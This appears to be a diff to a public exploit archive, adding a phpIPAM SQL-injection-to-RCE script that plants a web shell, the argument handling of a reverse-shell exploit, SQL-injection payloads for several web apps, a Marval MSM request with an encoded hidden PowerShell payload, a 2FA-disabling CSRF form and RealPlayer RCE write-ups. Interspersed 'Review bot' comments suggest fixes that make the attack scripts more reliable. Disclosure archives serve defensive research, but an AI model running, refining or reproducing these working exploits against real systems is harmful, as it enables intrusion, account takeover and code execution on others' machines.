# Print help if specified or if a target or authentication is not provided
if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):
help()
# Collect target IP and port from CLI
if args[1] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[1]) + 1]:
raise
targetIP = sys.argv[sys.argv.index(args[1]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[1]) + 2]:
raise
targetPort = sys.argv[sys.argv.index(args[1]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")
exit()
# Collect target username and password from CLI
if args[2] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[2]) + 1]:
raise
targetUser = sys.argv[sys.argv.index(args[2]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[2]) + 2]:
raise
targetPass = sys.argv[sys.argv.index(args[2]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")
exit()
# Collect PHPSESSID from CLI, if specified
if args[3] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[3]) + 1]:
raise
targetSess = sys.argv[sys.argv.index(args[3]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")
exit()
# Set reverse shell mode from CLI, if specified
if args[4] in sys.argv:
exploitMode = "shell"
try:
if "-" in sys.argv[sys.argv.index(args[4]) + 1]:
raise
localIP = sys.argv[sys.argv.index(args[4]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[4]) + 2]:
raise
localPort = sys.argv[sys.argv.index(args[4]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Set custom command mode from CLI, if specified
elif args[5] in sys.argv:
exploitMode = "command"
try:
if sys.argv[sys.argv.index(args[5]) + 1] in args:
raise
command = sys.argv[sys.argv.index(args[5]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Set web shell mode from CLI, if specified
elif args[6] in sys.argv:
exploitMode = "web"
try:
if sys.argv[sys.argv.index(args[6]) + 1] in args:
raise
if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:
webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"
else:
webName = sys.argv[sys.argv.index(args[6]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")
exit()
exploit(exploitMode,targetSess)
# Run with default web shell mode if no mode is specified
else:
exploit(exploitMode,targetSess)
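Review bot: The bare `except:` in the reverse-shell branch of `exploit` prints `Reverse shell executed!` for every exception, including a DNS failure or a refused connection, so that success line is not evidence that anything ran; catch `requests.exceptions.Timeout` for the intended case and report any other exception as an error. The same bare `except:` pattern around the argument parsing turns any `IndexError` into a fixed message, and the message for `-w` reads `"-c <name.php>"` where it should say `-w`. `verify=False` on the upload disables certificate validation, and since every URL in the file is built with `http://` it is dead weight that should be removed rather than copied into an HTTPS variant. The `"-" in sys.argv[...]` checks reject any value containing a hyphen, so a password or a hostname such as `my-host` is mis-reported as a missing argument. `def help():` shadows the builtin of the same name; `usage()` would avoid that.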

88
exploits/php/webapps/50963.py Executable file

@ -0,0 +1,88 @@
# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-04-10
# Exploit Author: Guilherme '@behiNdyk1' Alves
# Vendor Homepage: https://phpipam.net/
# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5
# Version: 1.4.5
# Tested on: Linux Ubuntu 20.04.3 LTS
#!/usr/bin/env python3
import requests
import argparse
from sys import exit, argv
from termcolor import colored
banner = """
\n"""
print(banner)
parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")
parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)
parser.add_argument("-usr", type=str, help="Username to log in as", required=True)
parser.add_argument("-pwd", type=str, help="User's password", required=True)
parser.add_argument("-cmd", type=str, help="Command to execute", default="id")
parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")
parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")
args = parser.parse_args()
url = args.url
username = args.usr
password = args.pwd
command = args.cmd
path = args.path
# Validating url
if url.endswith("/"):
url = url[:-1]
if not url.startswith("http://") and not url.startswith("https://"):
print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))
exit()
def login(url, username, password):
"""Takes an username and a password and tries to execute a login (IPAM)"""
data = {
"ipamusername": username,
"ipampassword": password
}
print(colored(f"[...] Trying to log in as {username}", "blue"))
r = requests.post(f"{url}/app/login/login_check.php", data=data)
if "Invalid username or password" in r.text:
print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))
exit()
else:
print(colored("[+] Login successful!", "green"))
return str(r.cookies['phpipam'])
auth_cookie = login(url, username, password)
def exploit(url, auth_cookie, path, command):
print(colored("[...] Exploiting", "blue"))
vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"
data = {
"subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",
"bgp_id": "1"
}
cookies = {
"phpipam": auth_cookie
}
requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)
test = requests.get(f"{url}/evil.php")
if test.status_code != 200:
return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))
if "--shell" in argv:
while True:
command = input("Shell> ")
r = requests.get(f"{url}/evil.php?cmd={command}")
print(r.text)
else:
print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))
r = requests.get(f"{url}/evil.php?cmd={command}")
print(f"\n\n[+] Output:\n{r.text}")
exploit(url, auth_cookie, path, command)
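Review bot: `--shell` is declared on the parser with `nargs="?"` and `type=str`, but `args.shell` is never read — the mode is detected by `"--shell" in argv` inside `exploit()`, so argparse's parsed value is ignored and any token passed after the flag is silently consumed. Declare it as `parser.add_argument("--shell", action="store_true", help="Spawn a shell (non-interactive)")` and test `if args.shell:` in place of the `argv` check. `login()` also indexes `r.cookies['phpipam']` unguarded, which surfaces as a bare KeyError rather than the script's own error message whenever the server sets no such cookie (a redirect or an unexpected status, for instance). Finally, the header documents no precondition for the `INTO OUTFILE` write in the `subnet` payload; a comment such as `# Requires: DB account with FILE privilege and a secure_file_priv setting that permits --path` would explain the only failure hint the script gives, the status-code check after the write.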


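--- a/exploits/php/webapps/50965.txt
+++ b/exploits/php/webapps/50965.txt
@@ -0,0 +1,27 @@
+# Exploit Title: ChurchCRM 4.4.5 - SQLi
+# Exploit Author: nu11secur1ty
+# Date: 05.11.2022
+# Vendor: https://churchcrm.io/
+# Software: https://github.com/ChurchCRM/CRM
+# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
+## Description:
+There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
+[+] Payloads:
+```mysql
+---
+Parameter: PersonID (GET)
+Type: boolean-based blind
+Title: Boolean-based blind - Parameter replace (original value)
+Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
+(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: PersonID=1 AND (SELECT 7116 FROM
+(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
+---
+```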


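--- a/exploits/php/webapps/50966.txt
+++ b/exploits/php/webapps/50966.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
+# Date: 12/06/2022
+# Exploit Author: twseptian
+# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
+# Version: v1.0
+# Tested on: Kali Linux
+# Vulnerable code
+line 9 in file "/oahms/admin/login.php"
+$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
+# Steps of reproduce:
+1. Go to the admin login page http://localhost/oahms/admin/login.php
+2. sqli payload: admin' or '1'='1';-- -
+3. password: password
+# Proof of Concept
+POST /oahms/admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/oahms/admin/login.php
+Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=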


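--- a/exploits/windows/local/50953.txt
+++ b/exploits/windows/local/50953.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
+# Google Dork: n/a
+# Date: May 31, 2022
+# Exploit Author: Eduardo Braun Prado
+# Vendor Homepage: http://real.com/
+# Software Link: http://real.com/
+# Version: v.20.0.8.310
+# Tested on: Windows 7, 8.1, 10
+# CVE : N/A
+Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE
+Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which
+is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things.
+By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same
+Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the
+case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the
+'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design.
+Prohibiting the 'javascript:' URI in the control mitigates the issue.
+The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it.
+The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name
+to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX.
+Vulnerability can be exploited by opening a Real Player playlist file such as RAM files.
+To reproduce the issue, do the following:
+a) Setup a web server
+b) on the web server root directory, extract the "RP_G2" folder to it.
+c) open the just extracted "RP_G2" folder and then open the following files in a text editor:
+"poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files)
+d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio".
+e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds.
+Note: to open startup folder do this: open the "Run" menu and then type:
+shell:Startup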


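--- a/exploits/windows/local/50954.txt
+++ b/exploits/windows/local/50954.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
+# Google Dork: n/a
+# Date: May 31, 2022
+# Exploit Author: Eduardo Braun Prado
+# Vendor Homepage: http://real.com/
+# Software Link: http://real.com/
+# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
+# Tested on: Windows 7, 8.1, 10
+# CVE : N/A
+PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip
+vídeo: https://youtu.be/CONlijEgDLc
+Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific:
+The 'external' object and it exposes several custom methods and properties.
+The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading
+which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths
+allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user
+closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait
+until reboot (true when file is planted in 'startup' folder).
+The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share.
+The directory 'appdata' must be placed in the share's root.
+The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11)
+tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309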


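--- a/exploits/windows/local/50959.txt
+++ b/exploits/windows/local/50959.txt
@@ -0,0 +1,29 @@
+# Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
+# Date: 2022-06-06
+# Exploit Author: Ali Alipour
+# Vendor Homepage: https://support.hp.com/us-en/document/c01998934
+# Software Link: https://support.hp.com/us-en/drivers/selfservice/hp-laserjet-pro-m1212nf-multifunction-printer-series/3965847
+# Version: 20180815_1
+# Tested on: Windows 10 Pro x64
+# CVE : N/A
+# Service info:
+C:\Users\Wr3ak>sc qc "HPM1210RcvFaxSrvc"
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: HPM1210RcvFaxSrvc
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files\HP\HP LaserJet M1210 MFP Series\ReceiveFaxUtility.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : HP LaserJet Professional M1210 MFP Series Receive Fax Service
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+#Exploit:
+The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.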


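--- a/exploits/windows/remote/50956.txt
+++ b/exploits/windows/remote/50956.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27/5/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.marvalnorthamerica.com/
+# Software Link: https://www.marvalnorthamerica.com/
+# Version: v14.19.0.12476
+# Tested on: Windows
+# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce
+POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2
+Host: MSMHandler.io
+Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
+Accept: application/json, text/javascript, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 456
+Origin: https://MSMHandler.io
+Dnt: 1
+Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true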


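--- a/exploits/windows/remote/50957.txt
+++ b/exploits/windows/remote/50957.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
+# Date: 27/5/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.marvalnorthamerica.com/
+# Software Link: https://www.marvalnorthamerica.com/
+# Version: v14.19.0.12476
+# Tested on: Windows
+# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
+# 2FA Bypass:
+<html>
+<body>
+<form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>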


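--- a/exploits/windows/remote/50958.txt
+++ b/exploits/windows/remote/50958.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Virtua Software Cobranca 12S - SQLi
+# Shodan Query: http.favicon.hash:876876147
+# Date: 13/08/2021
+# Exploit Author: Luca Regne
+# Vendor Homepage: https://www.virtuasoftware.com.br/
+# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
+# Version: 12S
+# Tested on: Windows Server 2019
+# CVE : CVE-2021-37589
+------------------------------------------------------------------------
+## Description
+A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.
+## Request PoC
+```
+POST /controller/login.php?acao=autenticar HTTP/1.1
+Host: redacted.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Connection: close
+Cookie: origem_selecionado=; PHPSESSID=
+idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario
+```
+This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error.
+```
+POST /controller/login.php?acao=autenticar HTTP/1.1
+Host: redacted.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Connection: close
+Cookie: origem_selecionado=; PHPSESSID=
+idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario
+```
+## Exploit
+Save the request from burp to file
+```bash
+python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent
+```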


@ -11486,6 +11486,9 @@ id,file,description,date,author,type,platform,port
50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18701,6 +18704,12 @@ id,file,description,date,author,type,platform,port
50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware,
50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware,
50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware,
50956,exploits/windows/remote/50956.txt,"Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Momen Eldawakhly",remote,windows,
50958,exploits/windows/remote/50958.txt,"Virtua Software Cobranca 12S - SQLi",1970-01-01,"Luca Regne",remote,windows,
50957,exploits/windows/remote/50957.txt,"Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Momen Eldawakhly",remote,windows,
50960,exploits/hardware/remote/50960.py,"Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Filip Carlsson",remote,hardware,
50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware,
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -45015,3 +45024,10 @@ id,file,description,date,author,type,platform,port
50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,
50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php,
50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,
50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",1970-01-01,"Andrea Intilangelo",webapps,multiple,
50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UNICORD,webapps,php,
50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Guilherme Alves",webapps,php,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
50966,exploits/php/webapps/50966.txt,"Old Age Home Management System 1.0 - SQLi Authentication Bypass",1970-01-01,twseptian,webapps,php,
50967,exploits/hardware/webapps/50967.txt,"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
50968,exploits/hardware/webapps/50968.txt,"SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
